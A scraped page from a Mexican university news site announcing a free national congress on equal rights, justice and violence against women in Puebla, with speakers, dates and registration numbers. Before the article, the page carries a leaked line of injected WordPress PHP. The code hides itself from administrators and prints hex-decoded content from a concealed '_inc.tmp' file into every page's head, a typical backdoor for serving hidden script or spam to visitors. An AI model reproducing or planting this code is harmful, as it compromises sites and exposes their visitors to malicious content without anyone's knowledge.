if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Habrá Congreso Nacional Derechos Justicia Igualitaria – La Opinión Universitaria La Opinión Universitaria
Menu

Habrá Congreso Nacional Derechos Justicia Igualitaria

En México, más del 50% de las mujeres mayores de 15 años han vivido algún tipo de violencia  ya sea física, sexual o psicológica; y éstas se cometen en los espacios escolares, laborales, comunitarios, familiares o en sus relaciones de pareja.
Las consecuencias de la violencia, pueden ocasionar un daño permanente y en algunos casos irreversible, como la muerte, lo que impacta negativamente en el entorno social.
como sociedad debemos entender el fenómeno, para lograr erradicarlo y aprender a decir Ya No Mas.
Por ello, los invitamos, a todas y todos, al Primer Congreso Nacional Derechos Justicia Igualitaria que estamos organizando el Instituto de Ciencias Jurídicas de Puebla y la asociación civil “Ya No Más”. El próximo lunes 18 y martes de 19 de marzo  en el Auditorio José Antonio Corvera del ICI, partir de las 8:30 hrs.
Compartiremos sobre los esfuerzos que hacen nuestras diputadas desde el Congreso, ahondaremos sobre el significado de sororidad y compartiremos temas sobre la pareja, el amor y la codependencia.
Tendremos como ponentes a Frida Guerrera, Dip. Federal Lucero Saldaña, Dip. Roció Garcia Olmedo, Dip. Federal Maria Alemán Muñoz, Dip. Gabriela Hernandez de Durango, Dip. Josefina GARCIA Hernandez, Mtra. Diva Gastélum, Mtra. Gabriela Moreno Valle, Olimpia Coral Melo Cruz, Aura Medina de Witt, entre otras.
Es un evento totalmente gratuito, se pueden inscribir en la página de “Ya No Más A.C” o en los siguientes teléfonos (222)2602468 o (55)57299600 ext 1632
¡No se lo puedes perder!
  • No comments

    Deja una respuesta

    Tweets recientes